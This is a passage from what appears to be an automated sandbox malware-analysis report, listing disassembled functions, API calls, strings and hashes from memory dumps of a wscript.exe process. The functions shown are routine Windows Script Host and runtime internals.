                                            • Opcode ID: 2dd08eb44f380ccdedcf3afb593475542753785530e8718685757380864c0a8c
                                            • Instruction ID: b204b234801a56f827c34904d70b3aa97d6dabeb54e22d31967d94bb22485646
                                            • Opcode Fuzzy Hash: 2dd08eb44f380ccdedcf3afb593475542753785530e8718685757380864c0a8c
                                            • Instruction Fuzzy Hash: 4F918175A10209EFCB14DF98DDA5AEE7BB6FF48314F100069E612A7390DB70AD41CB54
                                            Function 009BD4A0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233COMMON
                                            Download Yara Rule
                                            APIs
                                            • SysFreeString.OLEAUT32(?), ref: 009BD6F1
                                            • SysFreeString.OLEAUT32(?), ref: 009BD6FA
                                            • SysFreeString.OLEAUT32(?), ref: 009BD703
                                            • SysFreeString.OLEAUT32(?), ref: 009BD70C
                                            • SysFreeString.OLEAUT32(?), ref: 009BD715
                                            Strings
                                            • WScript_OnScriptTerminate, xrefs: 009BD651
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FreeString
                                            • String ID: WScript_OnScriptTerminate
                                            • API String ID: 3341692771-526745235
                                            • Opcode ID: d8824c983057a60700de372b7e99a00dbd6ea8dc2048dd3a14c8b4fac4df4414
                                            • Instruction ID: 9cd483cbec36774cbc9b265f8e85c4091b4f4da810594f3af7a74526de530759
                                            • Opcode Fuzzy Hash: d8824c983057a60700de372b7e99a00dbd6ea8dc2048dd3a14c8b4fac4df4414
                                            • Instruction Fuzzy Hash: 7881A1B1A11205EFCF18DF94D999AAE7BB6FF48324F100069F516A73A0EB74AD01CB50
                                            Function 009BBCC8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 107registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 009C5846: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C5873
                                            • RegCloseKey.ADVAPI32(?,00000000,-00000001,009B1100,009B10C4), ref: 009BBDC4
                                            • RegCloseKey.ADVAPI32(00000000,00000000,-00000001,009B1100,009B10C4), ref: 009BBDD2
                                              • Part of subcall function 009C5C39: RegQueryValueExW.ADVAPI32(00000000,Enabled,00000000,?,?,?,00000000,00000000,Enabled), ref: 009C5C99
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Close$OpenQueryValue
                                            • String ID: IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                            • API String ID: 1607946009-2293819020
                                            • Opcode ID: 34e5add2057677f7558d4bb7fd4c457596ab80d0e1b25c0caa847d59c7bfbf25
                                            • Instruction ID: 6c4ab8a67258778fed48bf4a5445b509ba51b0971f5e0875218c0cbb32cbba9b
                                            • Opcode Fuzzy Hash: 34e5add2057677f7558d4bb7fd4c457596ab80d0e1b25c0caa847d59c7bfbf25
                                            • Instruction Fuzzy Hash: A9316EB4F0524DABDB14DAA58691BEEBBBD9FC4320B4840AD9841A32C1D779EE05C720
                                            Function 009BC992 Relevance: 10.6, APIs: 7, Instructions: 93COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 009BC9B0
                                            • GetLastError.KERNEL32 ref: 009BC9BC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: DirectoryErrorLastSystem
                                            • String ID:
                                            • API String ID: 3081803543-0
                                            • Opcode ID: c441e804adc4097fec968ca2328a0a01f81ae1cc9b70073c7f487c8cd02bd5c3
                                            • Instruction ID: ce930688bfcdc9db63e6ecb5207aa772054ee0a451fab02afc5f858d7270eb33
                                            • Opcode Fuzzy Hash: c441e804adc4097fec968ca2328a0a01f81ae1cc9b70073c7f487c8cd02bd5c3
                                            • Instruction Fuzzy Hash: FB210AB6A04216AFDB05DFA8CC49EBEB7BDFF85320B11446AE846D7311DA30DC018B60
                                            Function 009C3124 Relevance: 10.6, APIs: 7, Instructions: 81COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 009C3158
                                            • SysFreeString.OLEAUT32(?), ref: 009C31A9
                                            • SysFreeString.OLEAUT32(?), ref: 009C31B2
                                            • SysFreeString.OLEAUT32(?), ref: 009C31BB
                                            • SysFreeString.OLEAUT32(00000000), ref: 009C31DE
                                            • SysFreeString.OLEAUT32(00000000), ref: 009C31ED
                                            • free.MSVCRT(?,?,?,?,?,?,?,?,?,009C3110), ref: 009C31F4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FreeString$ArrayDestroySafefree
                                            • String ID:
                                            • API String ID: 1006837209-0
                                            • Opcode ID: 02bf3767008051ebd79358f75d93f165295c8287bc7552c838fafd0583ee6607
                                            • Instruction ID: 1a47742a71865700386a4c4eeb1c7d55adb39db31cb2a167185d5632b3a4f912
                                            • Opcode Fuzzy Hash: 02bf3767008051ebd79358f75d93f165295c8287bc7552c838fafd0583ee6607
                                            • Instruction Fuzzy Hash: A7219E71A18100EFCB258F18D98CF587BF9FF48324B19C0ACE9568B261CB319D41DB52
                                            Function 009C70E2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383},00000000,00000001,?,?), ref: 009C711A
                                            • RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,?,00000006,00000000), ref: 009C7137
                                            • RegCloseKey.ADVAPI32(?), ref: 009C7142
                                            • _wcsnicmp.MSVCRT ref: 009C715A
                                            Strings
                                            • Locale, xrefs: 009C712F
                                            • Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 009C7110
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue_wcsnicmp
                                            • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                            • API String ID: 2262609651-1161606707
                                            • Opcode ID: 9f78c01a032703c40be483ef531b802273e30f3f635f5e2050b94bbdc4c8613c
                                            • Instruction ID: 475518fe09ba98f912aacfb03c04722b2ebfc993bd97b778f9079b119452288c
                                            • Opcode Fuzzy Hash: 9f78c01a032703c40be483ef531b802273e30f3f635f5e2050b94bbdc4c8613c
                                            • Instruction Fuzzy Hash: F311A035D2821AEBCB109FE5DD0DFBFB7BDEB84740F050018E912A3160E6308A05EB65
                                            Function 009C04E0 Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 009C04FE
                                            • _ftol2.MSVCRT ref: 009C0548
                                            • MsgWaitForMultipleObjectsEx.USER32(00000000,00000000,00000000,00001DFF,00000004), ref: 009C055D
                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009C056D
                                            • DispatchMessageA.USER32(?), ref: 009C057C
                                            • GetTickCount.KERNEL32 ref: 009C0594
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CountMessageTick$DispatchMultipleObjectsPeekWait_ftol2
                                            • String ID:
                                            • API String ID: 4281434459-0
                                            • Opcode ID: 6cdcea434feb586f372105eb3c62309d86f37f30b915d525c8d040e908242743
                                            • Instruction ID: 541399beef9dde27c3fdb2366d3e5708a48c0baac9014004fb218bf5dc369c52
                                            • Opcode Fuzzy Hash: 6cdcea434feb586f372105eb3c62309d86f37f30b915d525c8d040e908242743
                                            • Instruction Fuzzy Hash: F621DF71E0834AABE711AF62DD0CF9B7BB8FBC4350F114A1CFA95D11A4EB20C4148E92
                                            Function 009C459D Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 009C45B6
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 009C4606
                                            • SysStringLen.OLEAUT32(?), ref: 009C4617
                                            • SysStringLen.OLEAUT32(?), ref: 009C4622
                                            • VariantClear.OLEAUT32(?), ref: 009C4645
                                            • VariantClear.OLEAUT32(?), ref: 009C467B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Variant$ClearString$ArrayElementInitSafe
                                            • String ID:
                                            • API String ID: 598207039-0
                                            • Opcode ID: 6f0ea047156d9a69473ab16f6913861a1e7a0bba5b75a62e8776dbe7f12cf7d0
                                            • Instruction ID: 36bf8798d4176b32693bd9e8da257dabb030783da2a867b13667379c3048e1eb
                                            • Opcode Fuzzy Hash: 6f0ea047156d9a69473ab16f6913861a1e7a0bba5b75a62e8776dbe7f12cf7d0
                                            • Instruction Fuzzy Hash: 99314C72A08316AFC710DF64D998D5ABBE9FB88360F04492DF9A5C7251EB30D904CB92
                                            Function 009C6125 Relevance: 9.1, APIs: 6, Instructions: 83fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(009B9D3D,80000000,00000001,00000000,00000003,08000000,00000000,00000000,009B10C4,00000000,000000FF,000000FF,?,009B9D3D,009C2FD0), ref: 009C615C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009B9D3D,000000FF,00000000,00000000,00000000,00000000,00000000,009B10C4,00000000,000000FF,000000FF,?,009B9D3D,009C2FD0), ref: 009C616E
                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,009B9D3D,009C2FD0,?,?,?,00000000,009B10C4), ref: 009C617A
                                            • __alloca_probe_16.LIBCMT ref: 009C618E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateErrorFileLastMultiWide__alloca_probe_16
                                            • String ID:
                                            • API String ID: 2439737388-0
                                            • Opcode ID: b5c87c1eec24e2a3c95910a9f8c1ae7ddf4a1da5c54e6d695e982a5448778fe0
                                            • Instruction ID: b6c4122814f5a36332e9d1e175832247623c18ca6a17f074800841219b53ad79
                                            • Opcode Fuzzy Hash: b5c87c1eec24e2a3c95910a9f8c1ae7ddf4a1da5c54e6d695e982a5448778fe0
                                            • Instruction Fuzzy Hash: EA212730A19124BBEB315B668C4DFAB7EADEF467B1F24011CB519E51D2CA709900D7F2
                                            Function 009C25D4 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 313COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -$/$cscript$wscript
                                            • API String ID: 0-2169273652
                                            • Opcode ID: 83a080412ef76bcd39ac7dec2c5bb423aa2f0229ce429f7220a774d37d90b612
                                            • Instruction ID: 944f29abb43b2243314ce6efba2e44039ef7bb7c5759d6e8e29dc2956a2c9a95
                                            • Opcode Fuzzy Hash: 83a080412ef76bcd39ac7dec2c5bb423aa2f0229ce429f7220a774d37d90b612
                                            • Instruction Fuzzy Hash: 79B11730E043859AEB35CF788A44FFEBBF9AF11314F24491ED881A7291D2759A85C763
                                            Function 009C6DF5 Relevance: 9.1, APIs: 6, Instructions: 60filelibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,009C75C3,00000000), ref: 009C6E10
                                            • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,009C75C3,00000000), ref: 009C6E24
                                            • CloseHandle.KERNEL32(00000000,?,009C75C3,00000000), ref: 009C6E2D
                                            • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,009C75C3,00000000), ref: 009C6E3D
                                            • CloseHandle.KERNEL32(00000000,?,009C75C3,00000000), ref: 009C6E46
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,009C75C3,00000000), ref: 009C6E67
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                            • String ID:
                                            • API String ID: 1262414356-0
                                            • Opcode ID: b38e0bdad70c1dd16b1100dc6f28017a7fb3cb20da10bf474c886023f7b8d154
                                            • Instruction ID: f1441a8c0bfda5ca975338b2e0931a7b25da9729dd95d973b6d9e8ab62024262
                                            • Opcode Fuzzy Hash: b38e0bdad70c1dd16b1100dc6f28017a7fb3cb20da10bf474c886023f7b8d154
                                            • Instruction Fuzzy Hash: D70126B6E18218BFF7201735AC8DF7B655CD78AFE9F194529FA0193180D5618C205270
                                            Function 04DAB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: b3e618fb3986f9bcd7f3a48a204262d4fb94d2542e4c936246be65e237db17a5
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 0D81A030E052499EDF24CF68C8517BEBBB1BF45310F1C461BDAA1AB2D1D774B8628B61
                                            Function 009BBC11 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 62registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCloseKey.ADVAPI32(00000000,00000001,?,?,?,00000000,00000000,?,?,?,?,009B809D,00000000,00000000), ref: 009BBC93
                                            • RegCloseKey.ADVAPI32(00000000,00000001,?,?,?,00000000,00000000,?,?,?,?,009B809D,00000000), ref: 009BBCA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Close
                                            • String ID: Enabled$Remote$Software\Microsoft\Windows Script Host\Settings
                                            • API String ID: 3535843008-3078226056
                                            • Opcode ID: 368c1bbdcad5d9258db615cebefcbdcf3e653c54219146212e00c1f92c03ca1e
                                            • Instruction ID: bc2719862177562498010dada63c6193d1df35a1f6a701bb46539b1ef827491d
                                            • Opcode Fuzzy Hash: 368c1bbdcad5d9258db615cebefcbdcf3e653c54219146212e00c1f92c03ca1e
                                            • Instruction Fuzzy Hash: 181191B1E10218BBEB14DB88CE05BEE7EBEDFC0321F144169B841672A5CBB05E41E694
                                            Function 009B808B Relevance: 7.6, APIs: 5, Instructions: 103windowthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                            • GetCurrentThreadId.KERNEL32 ref: 009B80C5
                                            • CoRegisterClassObject.OLE32(009B3A14,00000000,00000014,00000000,?,00000000,00000000,?,?,?,009B9188,000000FF,000000FF,000000FF), ref: 009B80ED
                                            • DispatchMessageA.USER32(?), ref: 009B814D
                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 009B815A
                                            • CoRevokeClassObject.OLE32(?,?,?,009B9188,000000FF,000000FF,000000FF,?,?,00000000), ref: 009B8167
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ClassMessageObject$CurrentDispatchRegisterRevokeThreadmalloc
                                            • String ID:
                                            • API String ID: 2658232301-0
                                            • Opcode ID: 47f3c08693870c2a5f431e9f3f249c12f3ed2e87bfd7bd08c7e1f24d3042faec
                                            • Instruction ID: 96200d3cccd6e242cd4cca974aaeed7cf5acdb54118044ecd3f3583eaf701b37
                                            • Opcode Fuzzy Hash: 47f3c08693870c2a5f431e9f3f249c12f3ed2e87bfd7bd08c7e1f24d3042faec
                                            • Instruction Fuzzy Hash: D831A275A04215EBCB109FA9D948ADFBABCEF8D360F144455E601A7250CF75DC02CB60
                                            Function 009C59B9 Relevance: 7.6, APIs: 5, Instructions: 97registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,009B10C4,009B10C4,?,00000000,009B10C4), ref: 009C5A08
                                            • __alloca_probe_16.LIBCMT ref: 009C5A52
                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,?,009B10C4,009B10C4,?,00000000,009B10C4), ref: 009C5A6A
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000001,?,?,?,?,009B10C4,009B10C4,?), ref: 009C5A9C
                                            • GetLastError.KERNEL32(?,000000FF,00000001,?,?,?,?,009B10C4,009B10C4,?), ref: 009C5AA6
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: QueryValue$ByteCharErrorLastMultiWide__alloca_probe_16
                                            • String ID:
                                            • API String ID: 3112009249-0
                                            • Opcode ID: 4378dcabc4a5753efad828b4173f76d2962bc8dcdfaba2d720e312b811de4805
                                            • Instruction ID: bddb2feccf032e81b379f5ebee81165a7bb68252844a4b24152b2506ec89c693
                                            • Opcode Fuzzy Hash: 4378dcabc4a5753efad828b4173f76d2962bc8dcdfaba2d720e312b811de4805
                                            • Instruction Fuzzy Hash: 0B318131E10A15BFCB248B6B8888FEFBBBCEF45360F51825DE415D6150D630E981CBA2
                                            Function 009BFDD5 Relevance: 7.6, APIs: 5, Instructions: 86threadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                            • GetCurrentThreadId.KERNEL32 ref: 009BFE04
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,009B10C4,00000001,009B10C4,?,009B94FA,00000001,009B1314,-00000001,009B1100,009B10C4), ref: 009BFE26
                                            • GetLastError.KERNEL32(?,009B94FA,00000001,009B1314,-00000001,009B1100,009B10C4), ref: 009BFE33
                                            • CreateThread.KERNEL32(00000000,00000000,009BFEB0,00000000,00000000,00000014), ref: 009BFE57
                                            • CloseHandle.KERNEL32(?,?,?,?,009B94FA,00000001,009B1314,-00000001,009B1100,009B10C4), ref: 009BFE71
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CreateThread$CloseCurrentErrorEventHandleLastmalloc
                                            • String ID:
                                            • API String ID: 1671080663-0
                                            • Opcode ID: 41f7caca774c9da206b519cda692b4f92716281e5dfdf0c3930ed6a967be1fe8
                                            • Instruction ID: d1a8a56033520c0c9be410df9ed39c914644b979a2aeb269c06afa54e60885d1
                                            • Opcode Fuzzy Hash: 41f7caca774c9da206b519cda692b4f92716281e5dfdf0c3930ed6a967be1fe8
                                            • Instruction Fuzzy Hash: E721A1B6800B16AF83108F5ADD99966FABCFF84764311823DA80597611D730EC108AE0
                                            Function 04D8F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04DD02E7
                                            • RTL: Re-Waiting, xrefs: 04DD031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04DD02BD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: c448c8c63b12441a92fc459fd945b3efeb63c20df6c04100ac10094b6225fb01
                                            • Instruction ID: 7018c69168acbcea723e0c24c047b78b011ccf572d25cfbf95d013e355665a5b
                                            • Opcode Fuzzy Hash: c448c8c63b12441a92fc459fd945b3efeb63c20df6c04100ac10094b6225fb01
                                            • Instruction Fuzzy Hash: BEE1AD706047419FE725EF28C885B2AB7E0FB88318F140A5DF5A58B2E1E774F945CB52
                                            Function 009BE988 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 265comCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                              • Part of subcall function 009C51D4: GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C51E5
                                              • Part of subcall function 009C51D4: HeapFree.KERNEL32(00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C51EC
                                              • Part of subcall function 009C51D4: GetProcessHeap.KERNEL32(00000000,009B10C4,00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C520B
                                              • Part of subcall function 009C51D4: HeapAlloc.KERNEL32(00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C5212
                                            • CLSIDFromString.OLE32(009B9571,?,00001000,00000000,009B10C4,009B10C4), ref: 009BEA00
                                            • CoCreateInstance.OLE32(?,00000000,00000017,009B3860,00000000), ref: 009BEA21
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocCreateFreeFromInstanceStringmalloc
                                            • String ID: WSH$WScript
                                            • API String ID: 2172334828-1019903269
                                            • Opcode ID: fbe4332b0e8124bb18d72f05d783fe54d249acd0e6333a2d4ee1831cfe299de2
                                            • Instruction ID: ee39172c5bec277f5d2b1385a6dcd950c72cfe9b9caa279094eff7f58ec911d4
                                            • Opcode Fuzzy Hash: fbe4332b0e8124bb18d72f05d783fe54d249acd0e6333a2d4ee1831cfe299de2
                                            • Instruction Fuzzy Hash: 12918C75B106159FDB04CF99D995AADB7F9FF8C320F150069E502AB391CB74AC02CB90
                                            Function 009C29F8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: wcscpy_s$FreeString
                                            • String ID: WSH
                                            • API String ID: 4021863947-2133009938
                                            • Opcode ID: 78dfc21c4ef210601ab9aecef356882b2482b9a81ae049cb04512b257c274d9d
                                            • Instruction ID: f879ec90eefd079e55656c60106a0d8c278b71902538744b3405c1c205a08ea9
                                            • Opcode Fuzzy Hash: 78dfc21c4ef210601ab9aecef356882b2482b9a81ae049cb04512b257c274d9d
                                            • Instruction Fuzzy Hash: DB510574E142099BDB249F24DC99FAE73BAFF88304F1404ADE41697391CA30AD42DB52
                                            Function 04D9BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 04DD7BAC
                                            • RTL: Resource at %p, xrefs: 04DD7B8E
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04DD7B7F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 7afcc28e1c033fb10f1800d197f1d7ce5477f8170b7d062f6e8296455120db8c
                                            • Instruction ID: fb5dffbed5b56e7cf6c31d60eb7a3c31893aca12a38c1d71625f425dcbbf5d6a
                                            • Opcode Fuzzy Hash: 7afcc28e1c033fb10f1800d197f1d7ce5477f8170b7d062f6e8296455120db8c
                                            • Instruction Fuzzy Hash: 5141E0353007029FDB20DE25D840B6AB7E5FF88714F110A1EF89ADB680EB71F8058B91
                                            Function 04D9B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DD728C
                                            Strings
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04DD7294
                                            • RTL: Re-Waiting, xrefs: 04DD72C1
                                            • RTL: Resource at %p, xrefs: 04DD72A3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
